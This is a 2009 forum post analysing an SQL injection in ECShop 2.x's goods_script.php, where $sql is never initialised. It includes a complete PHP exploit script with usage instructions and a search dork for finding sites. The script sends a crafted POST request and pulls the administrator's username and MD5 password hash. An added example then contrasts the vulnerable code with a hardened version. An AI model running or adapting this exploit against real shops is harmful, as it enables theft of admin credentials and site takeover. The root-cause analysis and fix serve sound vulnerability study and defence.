无聊歌 posted on 2009-4-18 12:16:29

ECShop SQL Injection Vulnerability Analysis

Affects 2.5.x and 2.6.x; other versions not tested.
goods_script.php
Line 44:

The code is as follows:
if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);

$sql is never initialised, an obvious vulnerability :)
EXP:

The code is as follows:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works with register_globals = On
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
// the page echoes "user_name:password" inside an href; the md5 hash is 32 hex characters
// (the character class and the array indexes below were stripped in this copy and are restored here)
preg_match('#href="([\S]+):([a-f0-9]{32})"#', $resp, $hash);
if ($hash)
    exit("Exploit Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
    exit("Exploit Failed!\n");
function send()
{
    global $host, $path;
    // a "type" that matches no branch leaves $sql untouched, so the POST parameter "sql"
    // (turned into $sql by register_globals) becomes the whole statement before " LIMIT ..."
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
    $data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $cmd;
    // the tail of the original function is cut off in this copy; generic socket send/receive restored
    $fp = fsockopen($host, 80);
    fwrite($fp, $data);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);
    return $resp;
}
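To make the root cause concrete, here is an added example (my own code, not ECShop's and not part of the original post) that puts the vulnerable shape of the goods_script.php snippet next to a hardened one. The table names, the request array and the function names are constructed placeholders; extract() is used only as a stand-in for the effect of register_globals = On, which the exploit above relies on.

```php
<?php
// Added example, not ECShop's code: the vulnerable pattern from goods_script.php beside a fixed one.
// Table names and the request array are constructed placeholders; the branch structure mirrors the snippet.

// Vulnerable shape. extract() stands in for register_globals = On, which turns every
// request parameter into a local variable, so a POST parameter named "sql" pre-seeds $sql.
function vulnerable_build_sql(array $request): string
{
    extract($request, EXTR_OVERWRITE);          // demonstration of register_globals only
    if (empty($request['type'])) {
        $sql = "SELECT goods_id FROM ecs_goods";            // placeholder query
    } elseif ($request['type'] == 'collection') {
        $sql = "SELECT goods_id FROM ecs_collect_goods";    // placeholder query
    }
    // any other "type" skips both branches; $sql keeps whatever the request put there,
    // and intval() on goods_num protects only the LIMIT clause, not the statement in front of it
    $sql .= " LIMIT " . (!empty($request['goods_num']) ? intval($request['goods_num']) : 10);
    return $sql;
}

// Hardened shape: $sql is always initialised, "type" is checked against a whitelist and
// anything else is rejected, and the only user-derived value is an integer-cast, range-checked limit.
function hardened_build_sql(array $request): string
{
    $sql = '';
    $type = isset($request['type']) ? (string) $request['type'] : '';
    switch ($type) {
        case '':
            $sql = "SELECT goods_id FROM ecs_goods";
            break;
        case 'collection':
            $sql = "SELECT goods_id FROM ecs_collect_goods";
            break;
        default:
            throw new InvalidArgumentException("unsupported type");
    }
    $limit = isset($request['goods_num']) ? (int) $request['goods_num'] : 10;
    if ($limit < 1 || $limit > 100) {
        $limit = 10;
    }
    return $sql . " LIMIT " . $limit;
}

// Constructed request in the shape the advisory's exploit sends: a "type" that matches no
// branch, plus an attacker-chosen "sql" parameter. The statement itself is a harmless placeholder.
$request = [
    'type' => '1240000000',
    'sql'  => "SELECT 'attacker controlled' AS goods_id",
];

echo "vulnerable: " . vulnerable_build_sql($request) . "\n";

try {
    echo "hardened: " . hardened_build_sql($request) . "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened: request rejected (" . $e->getMessage() . ")\n";
}
```

Run it with `php example.php`: the vulnerable function returns the attacker's statement with " LIMIT 10" appended, which is exactly what `$db->query($sql)` would execute, while the hardened one rejects the request. Note that register_globals was removed in PHP 5.4, so on a modern interpreter the vulnerable function is only reachable through the extract() stand-in; the fix that does not depend on the interpreter setting is the one shown, initialising $sql and whitelisting `type`, so no request-controlled string ever reaches the query text.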